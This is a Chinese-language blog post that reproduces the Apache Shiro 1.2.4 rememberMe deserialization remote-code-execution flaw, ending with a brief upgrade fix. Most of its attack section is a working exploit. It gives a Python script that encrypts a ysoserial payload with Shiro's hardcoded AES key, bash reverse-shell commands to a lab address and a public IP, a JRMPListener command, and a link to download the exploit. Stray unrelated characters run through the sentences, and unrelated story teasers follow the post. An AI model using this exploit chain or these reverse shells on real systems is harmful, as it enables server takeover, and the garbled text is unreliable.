Shiro RememberMe 1.2.4 反序列化過程命令執(zhí)行漏洞

影響版本

Apache Shiro <= 1.2.4

原因分析

Apache Shiro默認(rèn)使用了CookieRememberMeManager,其處理cookie的流程是:得到rememberMe的cookie值 > Base64解碼–>AES解密–>反序列化退盯。然而AES的密鑰是硬編碼的,就導(dǎo)致了攻擊者可以構(gòu)造惡意數(shù)據(jù)造成反序列化的RCE漏洞铐殃。

AES加密

勾選記住密碼并登錄頁面上的賬號(hào)密碼,成功登錄后臺(tái)后返回Cookie中的rememberMe值為固定的512位

圖片.png

環(huán)境搭建

源碼搭建

git clone https://github.com/apache/shiro.git
git checkout shiro-root-1.2.4
cd ./shiro/samples/web

需要提前配置tomcat
mvn

為了配合生成反序列化的漏洞環(huán)境跨新,需要添加存在漏洞的 jar 包富腊,編輯 pom.xml文件,添加如下行:

圖片.png

修改完成后域帐,使用Maven 把存在漏洞環(huán)境 war包進(jìn)行編譯

最終可以將 target 目錄下生成的 samples-web-1.2.4.war 文件拷貝至 tomcat 目錄下的 webapps 目錄赘被,這里將其重命名為了 shiro.war 文件,啟動(dòng) tomcat肖揣, 在瀏覽器當(dāng)中輸入 http://localhost:8080/shiro 可以看到登錄頁面民假,如下圖:

圖片.png

如果不會(huì)編譯war包的話,我已經(jīng)整好了许饿,直接打包阳欲,
在文章下

然后,獲取我們復(fù)現(xiàn)需要用到的ysoserial工具

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -DskipTests

漏洞利用

惡意 Cookie rememberMe值構(gòu)造

前16字節(jié)的密鑰–>后面加入序列化參數(shù)–>AES加密–>base64編碼–>發(fā)送cookie

生成惡意rememberMe參數(shù)值Python代碼

python shiro.py 攻擊者IP:PORT

import sys import uuid import base64 import subprocess from Crypto.Cipher import AES def encode_rememberme(command): #ysoserial-0.0.6-SNAPSHOT-all.jar 文件需要在該文件目錄 popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") iv = uuid.uuid4().bytes encryptor = AES.new(key, AES.MODE_CBC, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext if __name__ == '__main__': payload = encode_rememberme(sys.argv[1]) print "rememberMe={0}".format(payload.decode())

圖片.png

記得勾選這個(gè)


圖片.png

用腳本生成惡意代碼


圖片.png

http://www.jackson-t.ca/runtime-exec-payloads.html
制作反彈shell
bash -i >& /dev/tcp/192.168.1.2/8888 0>&1

圖片.png

再使用ysoserial中JRMP監(jiān)聽模塊陋率,監(jiān)聽12345端口注意這里的端口是剛才生成rememberMe值的端口球化。 再加上生成的base64編碼。

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4xOTUuMjQyLzEyMzQ2IDA+JjE=}|{base64,-d}|{bash,-i}'

注意CommonsCollections4這里有個(gè)坑瓦糟,復(fù)現(xiàn)不成功的話筒愚,換成5,4菩浙,3巢掺,2都試試


圖片.png

然后nc監(jiān)聽12346,因?yàn)橥ㄟ^制作bash反彈12346端口


圖片.png

發(fā)送生成后的惡意代碼劲蜻,替換cookie里的值
圖片.png
圖片.png

圖片.png

成功拿到權(quán)限

下面是源碼和exp

鏈接:https://pan.baidu.com/s/1inm1RDfxgvfZ_q4yG6KDLA
提取碼:gy90
復(fù)制這段內(nèi)容后打開百度網(wǎng)盤手機(jī)App陆淀,操作更方便哦

漏洞修復(fù)

升級(jí)到Shiro 1.2.5以上版本

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市先嬉,隨后出現(xiàn)的幾起案子轧苫,更是在濱河造成了極大的恐慌,老刑警劉巖疫蔓,帶你破解...
    沈念sama閱讀 219,490評(píng)論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件含懊,死亡現(xiàn)場離奇詭異,居然都是意外死亡衅胀,警方通過查閱死者的電腦和手機(jī)岔乔,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,581評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來滚躯,“玉大人雏门,你說我怎么就攤上這事嘿歌。” “怎么了剿配?”我有些...
    開封第一講書人閱讀 165,830評(píng)論 0 356
  • 文/不壞的土叔 我叫張陵搅幅,是天一觀的道長阅束。 經(jīng)常有香客問我呼胚,道長,這世上最難降的妖魔是什么息裸? 我笑而不...
    開封第一講書人閱讀 58,957評(píng)論 1 295
  • 正文 為了忘掉前任蝇更,我火速辦了婚禮,結(jié)果婚禮上呼盆,老公的妹妹穿的比我還像新娘年扩。我一直安慰自己,他們只是感情好访圃,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,974評(píng)論 6 393
  • 文/花漫 我一把揭開白布厨幻。 她就那樣靜靜地躺著,像睡著了一般腿时。 火紅的嫁衣襯著肌膚如雪况脆。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,754評(píng)論 1 307
  • 那天批糟,我揣著相機(jī)與錄音格了,去河邊找鬼。 笑死徽鼎,一個(gè)胖子當(dāng)著我的面吹牛盛末,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播否淤,決...
    沈念sama閱讀 40,464評(píng)論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼悄但,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了石抡?” 一聲冷哼從身側(cè)響起檐嚣,我...
    開封第一講書人閱讀 39,357評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎汁雷,沒想到半個(gè)月后净嘀,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,847評(píng)論 1 317
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡侠讯,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,995評(píng)論 3 338
  • 正文 我和宋清朗相戀三年挖藏,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片厢漩。...
    茶點(diǎn)故事閱讀 40,137評(píng)論 1 351
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡膜眠,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情宵膨,我是刑警寧澤架谎,帶...
    沈念sama閱讀 35,819評(píng)論 5 346
  • 正文 年R本政府宣布,位于F島的核電站辟躏,受9級(jí)特大地震影響谷扣,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜捎琐,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,482評(píng)論 3 331
  • 文/蒙蒙 一会涎、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧瑞凑,春花似錦末秃、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,023評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至技掏,卻和暖如春铃将,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背零截。 一陣腳步聲響...
    開封第一講書人閱讀 33,149評(píng)論 1 272
  • 我被黑心中介騙來泰國打工麸塞, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人涧衙。 一個(gè)月前我還...
    沈念sama閱讀 48,409評(píng)論 3 373
  • 正文 我出身青樓哪工,卻偏偏與公主長得像,于是被迫代替她去往敵國和親弧哎。 傳聞我的和親對(duì)象是個(gè)殘疾皇子雁比,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,086評(píng)論 2 355